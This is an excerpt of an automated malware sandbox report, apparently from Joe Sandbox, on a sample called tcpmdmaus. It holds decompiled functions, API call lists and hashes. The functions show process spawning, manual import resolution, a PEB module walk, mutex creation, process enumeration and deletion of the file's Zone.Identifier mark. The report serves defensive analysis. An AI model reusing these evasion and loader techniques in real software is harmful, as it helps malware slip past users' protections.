CloseHandle.KERNEL32(?,?,000000FF), ref: 00951295
CloseHandle.KERNEL32(?,?,?,000000FF), ref: 0095129C

Memory Dump Source

Source File: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.372039615.0000000000950000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372056265.0000000000959000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372063080.000000000095A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: CloseHandle$FileModuleNameObjectSingleWait
String ID:
API String ID: 2436384749-0
Opcode ID: 3ec430dd1375b6f8fd62aff0fb1b6eada1fe23177deaa48c2ab452f89dd4e1fd
Instruction ID: b658f4ff3a794ab554f202c267c0773652163c18f3bc3a99eed5b4102c8dce4a
Opcode Fuzzy Hash: 3ec430dd1375b6f8fd62aff0fb1b6eada1fe23177deaa48c2ab452f89dd4e1fd
Instruction Fuzzy Hash: 0EE06D32929318ABCB016BE6FC48BACBB38FF0C713F004225F916D00B0DB214915EB56

Uniqueness

Uniqueness Score: -1.00%

Function 00951E71, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E00951E71(WCHAR* __esi) {
				int _t11;
				void* _t17;
				void* _t21;

				E00951870(_t17);
				 *(_t21 - 0x58) = 0x44;
				_t11 = CreateProcessW(__esi, 0, 0, 0, 0,  *(_t21 + 8), 0, 0, _t21 - 0x58, _t21 - 0x10); // executed
				if(_t11 == 0) {
					goto 0x24005e9;
					asm("int3");
					return _t11;
				} else {
					if( *((intOrPtr*)(_t21 + 0xc)) == 0) {
						CloseHandle( *(_t21 - 0x10));
						CloseHandle( *(_t21 - 0xc));
						return 1;
					} else {
						asm("movdqu xmm0, [ebp-0x10]");
						asm("movdqu [eax], xmm0");
						return 1;
					}
				}
			}

0x00951e71
0x00951e79
0x00951e95
0x00951e9d
0x00951ed5
0x00951eda
0x00951edb
0x00951e9f
0x00951ea4
0x00951ebc
0x00951ec5
0x00951ed4
0x00951ea6
0x00951ea6
0x00951eab
0x00951eb8
0x00951eb8
0x00951ea4

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,00000000,00000044,?), ref: 00951E95
CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,00000000,00000000,00000044,?), ref: 00951EBC
CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,00000000,00000000,00000044,?), ref: 00951EC5

Strings

D, xrefs: 00951E79

Memory Dump Source

Source File: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.372039615.0000000000950000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372056265.0000000000959000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372063080.000000000095A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess
String ID: D
API String ID: 2922976086-2746444292
Opcode ID: 930d5196052728eda9d70108ab0cab6e53d98d5e3ffff3fcf50509e4f2a3f77d
Instruction ID: d7d791d9aa9a5fec97bf6f488875b413131593a37822ceea4c4b0fac0134b6b6
Opcode Fuzzy Hash: 930d5196052728eda9d70108ab0cab6e53d98d5e3ffff3fcf50509e4f2a3f77d
Instruction Fuzzy Hash: EEF09071A50308ABEB218F95EC06BED777CEB08702F104252FE04A92D0DBB59984D794

Uniqueness

Uniqueness Score: -1.00%

Function 00957B40, Relevance: 4.5, APIs: 3, Instructions: 13
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_() {
				int _t3;
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t10;

				L00957800(_t7);
				L00957870(_t7); // executed
				_t3 = L00951030(); // executed
				if(_t3 != 0) {
					_t4 = L00951100(); // executed
					_t12 = _t4;
					if(_t4 != 0) {
						E009574D0(_t6, _t7, _t8, _t9, _t10, _t12);
					}
					ExitProcess(0);
				}
				ExitProcess(_t3); // executed
			}

0x00957b40
0x00957b45
0x00957b4a
0x00957b51
0x00957b5a
0x00957b5f
0x00957b61
0x00957b63
0x00957b63
0x00957b6a
0x00957b6a
0x00957b54

APIs

ExitProcess.KERNEL32 ref: 00957B54
ExitProcess.KERNEL32 ref: 00957B6A

Memory Dump Source

Source File: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.372039615.0000000000950000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372056265.0000000000959000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372063080.000000000095A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 606ad0a47feeef32e065955d62ce999c191800fb3f9bd5a86eefae02ee62d734
Instruction ID: 845a83882ce117efe596ca6fb1880cf554e3fdd58ac899511c7d9abafa184fe9
Opcode Fuzzy Hash: 606ad0a47feeef32e065955d62ce999c191800fb3f9bd5a86eefae02ee62d734
Instruction Fuzzy Hash: 35D0EA6095D24166EA10F7F37A4A72EA9A89F983C7F000110BF42A10A2FE24C608972A

Uniqueness

Uniqueness Score: -1.00%

Function 009511F6, Relevance: 3.0, APIs: 2, Instructions: 18
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_snwprintf.NTDLL ref: 009511F6
CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 0095120A

Memory Dump Source

Source File: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.372039615.0000000000950000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372056265.0000000000959000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372063080.000000000095A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: CreateMutex_snwprintf
String ID:
API String ID: 451050361-0
Opcode ID: bdf4385b66a40fe0b59081e3a5c03598c56c0ec875d7fdd49a67c664937ea6c9
Instruction ID: 3fbdf1a564588a01ed1cfe16ee04baa08cf4a27840667883a53f77e9afec3f2f
Opcode Fuzzy Hash: bdf4385b66a40fe0b59081e3a5c03598c56c0ec875d7fdd49a67c664937ea6c9
Instruction Fuzzy Hash: 17D0A73271430547D71056CE7C85B75F35CDB04713F0401B3FE18C1240D6A148D44B83

Uniqueness

Uniqueness Score: -1.00%

Function 00951B57, Relevance: 3.0, APIs: 2, Instructions: 11
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Process32FirstW.KERNEL32 ref: 00951B63
FindCloseChangeNotification.KERNELBASE ref: 00951B91

Memory Dump Source

Source File: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.372039615.0000000000950000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372056265.0000000000959000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372063080.000000000095A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindFirstNotificationProcess32
String ID:
API String ID: 2932581522-0
Opcode ID: 1b4ca817e71cdf387e46cdcc72851edc3abbed43d39dc23fc5505a9291fb909c
Instruction ID: c3e49270f6a8e8aaaaa38b71f72a485a3059382937ba6f29b29b80c8ff8c4c4c
Opcode Fuzzy Hash: 1b4ca817e71cdf387e46cdcc72851edc3abbed43d39dc23fc5505a9291fb909c
Instruction Fuzzy Hash: 94D01230426610EBD7549F22AC8CB7E7B3CEF09202B108155F40690091D7348A87CF6D

Uniqueness

Uniqueness Score: -1.00%

Function 00951B86, Relevance: 3.0, APIs: 2, Instructions: 7
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Process32NextW.KERNEL32 ref: 00951B86
FindCloseChangeNotification.KERNELBASE ref: 00951B91

Memory Dump Source

Source File: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.372039615.0000000000950000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372056265.0000000000959000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372063080.000000000095A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNextNotificationProcess32
String ID:
API String ID: 2947032094-0
Opcode ID: fb735ee9ef86ef45bc4fac6a851737528088b20c58ce5b962817b7463a1f35a4
Instruction ID: 563fea34a2cfb7074744549bd537d5e67db7552b2735e764ad154b010a1386a8
Opcode Fuzzy Hash: fb735ee9ef86ef45bc4fac6a851737528088b20c58ce5b962817b7463a1f35a4
Instruction Fuzzy Hash: 12B0123062B7108782206B336D5CF2D363C9F162433001222E407C00B1E738C4C2D75F

Uniqueness

Uniqueness Score: -1.00%

Function 00951850, Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00951850(long __ecx) {
				void* _t2;

				_t2 = RtlAllocateHeap(GetProcessHeap(), 8, __ecx); // executed
				return _t2;
			}

0x0095185a
0x00951860

APIs

GetProcessHeap.KERNEL32(00000008,-00000040,0095107F), ref: 00951853
RtlAllocateHeap.NTDLL(00000000), ref: 0095185A

Memory Dump Source

Source File: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.372039615.0000000000950000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372056265.0000000000959000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372063080.000000000095A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 6ef1b0903490bdd93c21220516c711e552cbeafc3b07bd825ec1bef950ebfb1e
Instruction ID: 187902b5f0766bf28044dc602eef821fd4994be39cd0d53e10d04bed2115420b
Opcode Fuzzy Hash: 6ef1b0903490bdd93c21220516c711e552cbeafc3b07bd825ec1bef950ebfb1e
Instruction Fuzzy Hash: EEA002B19657009FEE4457F59D1DA153568E74C703F048744715585150996554049726

Uniqueness

Uniqueness Score: -1.00%

Function 00951B78, Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE ref: 00951B91

Memory Dump Source

Source File: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.372039615.0000000000950000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372056265.0000000000959000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372063080.000000000095A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 91b5b3b17563f234ec7e3d1b911a09448b50517feda23971c0c982c3fa1ed6ae
Instruction ID: 846cab9dee8c8c6496983df6a40078caa433d0bdd0fa066427d5649b3bce06db
Opcode Fuzzy Hash: 91b5b3b17563f234ec7e3d1b911a09448b50517feda23971c0c982c3fa1ed6ae
Instruction Fuzzy Hash: 21B0121040D702D3011002621C9873D312C5A041423005033A40290480EB20C8C3C21E

Uniqueness

Uniqueness Score: -1.00%

Function 003C4285, Relevance: 1.4, APIs: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 003C4446

Memory Dump Source

Source File: 00000000.00000002.371845494.00000000003C3000.00000020.00020000.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.371799332.00000000003B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.371804412.00000000003B1000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.371810723.00000000003B4000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.371822996.00000000003BD000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.371838158.00000000003BF000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.371860441.00000000003C9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.371865348.00000000003CA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.371871752.00000000003CC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.371878013.00000000003CD000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.371896008.00000000003E0000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.371908483.00000000003ED000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.371918760.00000000003F3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.371927643.00000000003F9000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_tcpmdmaus.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e922879f8799bae376b821e174a72aa6bce7290e03e31c2b940cf6e3bbb04bab
Instruction ID: 61ed7a6b9f94bf55bf314b8017f01903d0a359368cd0ddc33f9fffe44f55e38b
Opcode Fuzzy Hash: e922879f8799bae376b821e174a72aa6bce7290e03e31c2b940cf6e3bbb04bab
Instruction Fuzzy Hash: BD410675A093808FC365DF29D190B9BFBF1ABC8364F14891EE89987350DB3598498F82

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00951966, Relevance: 3.1, APIs: 2, Instructions: 53
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00951966(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _t12;
				_Unknown_base(*)()* _t14;
				signed short _t15;
				CHAR* _t17;
				intOrPtr* _t19;
				intOrPtr _t20;
				struct HINSTANCE__* _t22;
				_Unknown_base(*)()** _t25;
				signed short* _t28;
				void* _t29;
				signed short _t34;

				_t20 = __ecx;
				_t12 =  *((intOrPtr*)(__edx + 0x80));
				 *((intOrPtr*)(_t29 - 4)) = __ecx;
				if(_t12 == 0 ||  *((intOrPtr*)(__edx + 0x84)) == 0) {
					L12:
					goto 0x24003cc;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return _t12;
				} else {
					_t19 = _t12 + __ecx;
					_t12 =  *((intOrPtr*)(_t19 + 0xc));
					if(_t12 == 0) {
						goto L12;
					} else {
						while(1) {
							_t14 = LoadLibraryA(_t12 + _t20);
							_t22 = _t14;
							 *(_t29 - 8) = _t22;
							if(_t22 == 0) {
								break;
							}
							_t20 =  *((intOrPtr*)(_t29 - 4));
							_t28 =  *_t19 + _t20;
							_t25 =  *((intOrPtr*)(_t19 + 0x10)) + _t20;
							_t15 =  *_t28;
							_t34 = _t15;
							if(_t34 == 0) {
								L11:
								_t12 =  *((intOrPtr*)(_t19 + 0x20));
								_t19 = _t19 + 0x14;
								if(_t12 != 0) {
									continue;
								} else {
									goto L12;
								}
							} else {
								L6:
								L6:
								if(_t34 >= 0) {
									_t17 = _t15 + 2 + _t20;
								} else {
									_t17 = _t15 & 0x0000ffff;
								}
								_t14 = GetProcAddress(_t22, _t17);
								if(_t14 == 0) {
									break;
								}
								_t20 =  *((intOrPtr*)(_t29 - 4));
								_t28 =  &(_t28[2]);
								_t22 =  *(_t29 - 8);
								 *_t25 = _t14;
								_t25 = _t25 + 4;
								_t15 =  *_t28;
								if(_t15 != 0) {
									goto L6;
								} else {
									goto L11;
								}
							}
							goto L14;
						}
						goto 0x24003e5;
						asm("int3");
						asm("int3");
						asm("int3");
						return _t14;
					}
				}
				L14:
			}

0x00951966
0x00951966
0x0095196c
0x00951974
0x009519ea
0x009519ea
0x009519ef
0x009519f0
0x009519f1
0x009519f2
0x009519f3
0x009519f4
0x009519f5
0x0095197f
0x0095197f
0x00951982
0x00951987
0x00000000
0x00951990
0x00951990
0x00951993
0x00951999
0x0095199b
0x009519a0
0x00000000
0x00000000
0x009519a4
0x009519aa
0x009519ac
0x009519ae
0x009519b0
0x009519b2
0x009519e0
0x009519e0
0x009519e3
0x009519e8
0x00000000
0x00000000
0x00000000
0x00000000
0x009519b4
0x00000000
0x009519b4
0x009519b4
0x009519be
0x009519b6
0x009519b6
0x009519b6
0x009519c2
0x009519ca
0x00000000
0x00000000
0x009519cc
0x009519cf
0x009519d2
0x009519d5
0x009519d7
0x009519da
0x009519de
0x00000000
0x00000000
0x00000000
0x00000000
0x009519de
0x00000000
0x009519b2
0x009519f6
0x009519fb
0x009519fc
0x009519fd
0x009519fe
0x009519fe
0x00951987
0x00000000

APIs

LoadLibraryA.KERNEL32(?), ref: 00951993
GetProcAddress.KERNEL32(00000000,-00000002), ref: 009519C2

Memory Dump Source

Source File: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.372039615.0000000000950000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372056265.0000000000959000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372063080.000000000095A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 0f8b7aeadbdbe01f286a4bf758c6d0a2341c683bf177c30bd293d6434b741a43
Instruction ID: 9b23dd65b530a9ff1f6da3d05be4ee5d3060e0178147e3c67e45488cb80f8657
Opcode Fuzzy Hash: 0f8b7aeadbdbe01f286a4bf758c6d0a2341c683bf177c30bd293d6434b741a43
Instruction Fuzzy Hash: C0118BB5A042029FDB24CF1AD8A1B7673B8BF54346F284268EC89D7341E730ED84CB21

Uniqueness

Uniqueness Score: -1.00%

Function 0095261F, Relevance: 3.0, APIs: 2, Instructions: 18COMMON

Download Yara Rule

APIs

RtlGetVersion.NTDLL ref: 0095262A
GetNativeSystemInfo.KERNEL32(?), ref: 00952634

Memory Dump Source

Source File: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.372039615.0000000000950000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372056265.0000000000959000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372063080.000000000095A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: InfoNativeSystemVersion
String ID:
API String ID: 2296905803-0
Opcode ID: f3acdd443cb5d787879d006991712227238864129791da74220004bd8175db48
Instruction ID: 3fdcc046fd0227fc70c94ba68672579bea0bfbadfbd124c26ee61d6ae08acf83
Opcode Fuzzy Hash: f3acdd443cb5d787879d006991712227238864129791da74220004bd8175db48
Instruction Fuzzy Hash: 4EE0E572D0421E8BCB14DB51D895AECBBB8EB29305F0501EAE509FA161EA35DB54CB10

Uniqueness

Uniqueness Score: -1.00%

Function 009515E0, Relevance: .0, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E009515E0(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _t3;
				void* _t5;
				intOrPtr* _t10;
				intOrPtr* _t12;

				_t3 =  *[fs:0x30];
				_t5 = __ecx;
				_t10 =  *((intOrPtr*)(_t3 + 0xc)) + 0xc;
				_t12 =  *_t10;
				if(_t12 == _t10) {
					L3:
					goto 0x240025d;
					return _t3;
				} else {
					while(1) {
						_t3 = E00951450( *((intOrPtr*)(_t12 + 0x30)));
						if(_t3 == _t5) {
							break;
						}
						_t12 =  *_t12;
						if(_t12 != _t10) {
							continue;
						} else {
							goto L3;
						}
						goto L5;
					}
					goto 0x2400270;
					asm("int3");
					return _t3;
				}
				L5:
			}

0x009515e0
0x009515ec
0x009515ee
0x009515f1
0x009515f5
0x00951609
0x00951609
0x0095160e
0x009515f7
0x009515f7
0x009515fa
0x00951601
0x00000000
0x00000000
0x00951603
0x00951607
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00951607
0x0095160f
0x00951614
0x00951615
0x00951615
0x00000000

Memory Dump Source

Source File: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.372039615.0000000000950000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372056265.0000000000959000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372063080.000000000095A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35a2efc2ce021a38cec08f6c5d99d59b3d449ca4ed5566602958080abf24bf80
Instruction ID: d91092243e95eb7e9a4c18e121c84b8498b4303390261e3cacecb40d5eb11618
Opcode Fuzzy Hash: 35a2efc2ce021a38cec08f6c5d99d59b3d449ca4ed5566602958080abf24bf80
Instruction Fuzzy Hash: 02E01232511450CBDB31EA5685C0B75F36EEBC576272F146ADC5967650D3347C89C740

Uniqueness

Uniqueness Score: -1.00%

Function 00952010, Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.372039615.0000000000950000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372056265.0000000000959000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372063080.000000000095A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
Instruction ID: dd1ea78877d89c8c1f21003391c56dd86dd10fe21c56db2a52adb93900471d7c
Opcode Fuzzy Hash: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
Instruction Fuzzy Hash: 8EA00275752980CFCE12CB09C394F9073F4F744B41F0504F1E80997A11C238A900CA00

Uniqueness

Uniqueness Score: -1.00%

Function 0095839A, Relevance: 45.6, APIs: 1, Strings: 25, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0095839A(intOrPtr* __eax, void* __ecx, intOrPtr* __edi) {

				 *__edi =  *__edi + __ecx;
				 *__eax =  *__eax + __eax;
			}

0x0095839f
0x009583a4

APIs

_snwprintf.NTDLL ref: 00958473

Strings

V, xrefs: 00958449
d, xrefs: 0095841F
W, xrefs: 009583E0
i, xrefs: 00958457
\, xrefs: 00958411
r, xrefs: 0095843B
S, xrefs: 009583D2
w, xrefs: 00958426
i, xrefs: 009583F5
n, xrefs: 00958442
r, xrefs: 009583FC
r, xrefs: 00958450
F, xrefs: 009583D9
s, xrefs: 00958403
s, xrefs: 009583C5
", xrefs: 009583AA
n, xrefs: 0095845E
i, xrefs: 00958418
f, xrefs: 0095840A
\, xrefs: 009583EE
R, xrefs: 009583E7
\, xrefs: 0095842D
R, xrefs: 00958465
n, xrefs: 0095846C
u, xrefs: 00958434

Memory Dump Source

Source File: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.372039615.0000000000950000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372056265.0000000000959000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372063080.000000000095A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: _snwprintf
String ID: "$F$R$R$S$V$W$\$\$\$d$f$i$i$i$n$n$n$r$r$r$s$s$u$w
API String ID: 3988819677-4104559596
Opcode ID: dba28c28ed7d47b48a1f7727c84f8f1e65dc893b7b4ff4a855ab0716307a5734
Instruction ID: 5454c02a88fbc369027b1663f431004b14a8b42c4bf15115564f67c8cff6aec8
Opcode Fuzzy Hash: dba28c28ed7d47b48a1f7727c84f8f1e65dc893b7b4ff4a855ab0716307a5734
Instruction Fuzzy Hash: 1F21E2B0C0035DDFDB10CFC1A9886EDBFB5BB05709F10415ADA186A252C7FA4688CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00957C7A, Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 29COMMON

Download Yara Rule

APIs

_snwprintf.NTDLL ref: 00957CE7

Strings

f, xrefs: 00957CA7
%, xrefs: 00957C7A
i, xrefs: 00957CB5
w, xrefs: 00957CC3
s, xrefs: 00957CA0
d, xrefs: 00957CBC
\, xrefs: 00957C8B
i, xrefs: 00957C92
r, xrefs: 00957C99
\, xrefs: 00957CAE

Memory Dump Source

Source File: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.372039615.0000000000950000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372056265.0000000000959000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372063080.000000000095A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: _snwprintf
String ID: %$\$\$d$f$i$i$r$s$w
API String ID: 3988819677-1987356397
Opcode ID: 8533726d65e49faa8ab3a064c4b0bf761e4bd3d23f918c94934bde9fabbfb802
Instruction ID: 237401a5e4a60a37530132a6a1f54f922e869145536a7cac1fa0a664e66fc13f
Opcode Fuzzy Hash: 8533726d65e49faa8ab3a064c4b0bf761e4bd3d23f918c94934bde9fabbfb802
Instruction Fuzzy Hash: 34F0E1B0D5030CEEEB00DFD59819AEDBEB9EB04719F008145D61476551C3FA06488FA9

Uniqueness

Uniqueness Score: -1.00%

Function 009513AB, Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 24
fileCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E009513AB(short __eax) {
				void* _t20;

				 *((intOrPtr*)(_t20 - 0x28)) = 0x730025;
				 *((short*)(_t20 - 4)) = __eax;
				 *((intOrPtr*)(_t20 - 0x24)) = 0x5a003a;
				 *((intOrPtr*)(_t20 - 0x20)) = 0x6e006f;
				 *((intOrPtr*)(_t20 - 0x1c)) = 0x2e0065;
				 *((intOrPtr*)(_t20 - 0x18)) = 0x640049;
				 *((intOrPtr*)(_t20 - 0x14)) = 0x6e0065;
				 *((intOrPtr*)(_t20 - 0x10)) = 0x690074;
				 *((intOrPtr*)(_t20 - 0xc)) = 0x690066;
				 *((intOrPtr*)(_t20 - 8)) = 0x720065;
				 *0x95a7cc(_t20 - 0x230, 0x104, _t20 - 0x28, 0x95aab0);
				return DeleteFileW(_t20 - 0x230);
			}

0x009513ab
0x009513b2
0x009513c5
0x009513d2
0x009513d9
0x009513e0
0x009513e7
0x009513ee
0x009513f5
0x009513fc
0x00951403
0x0095141c

APIs

_snwprintf.NTDLL ref: 00951403
DeleteFileW.KERNEL32(?), ref: 00951413

Strings

t, xrefs: 009513EE
:, xrefs: 009513C5
%, xrefs: 009513AB
e, xrefs: 009513FC
e, xrefs: 009513D9
f, xrefs: 009513F5
I, xrefs: 009513E0
o, xrefs: 009513D2
e, xrefs: 009513E7

Memory Dump Source

Source File: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.372039615.0000000000950000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372056265.0000000000959000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372063080.000000000095A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: DeleteFile_snwprintf
String ID: %$:$I$e$e$e$f$o$t
API String ID: 366827715-465846046
Opcode ID: 81462acaeac67e0a81a271a60ef9afdc802596b9140a51cdff35ab2683629d57
Instruction ID: 37d175af4b58cf284dc8cb8ed4e0f4cf0ed1ad8f5e057e6ec4393e1d1055d3cc
Opcode Fuzzy Hash: 81462acaeac67e0a81a271a60ef9afdc802596b9140a51cdff35ab2683629d57
Instruction Fuzzy Hash: C9F092B0C11258AADB00DF8199486DEBFBAFB0870AF105299D50476600D7BA0698CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00956C3B, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 58
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00956C3B(short __eax) {
				void* _t51;
				void* _t54;
				void* _t55;

				 *(_t55 - 0x1c) = 0x640061;
				 *((short*)(_t55 - 4)) = __eax;
				 *((intOrPtr*)(_t55 - 0x18)) = 0x610076;
				 *((intOrPtr*)(_t55 - 0x14)) = 0x690070;
				 *((intOrPtr*)(_t55 - 0x10)) = 0x320033;
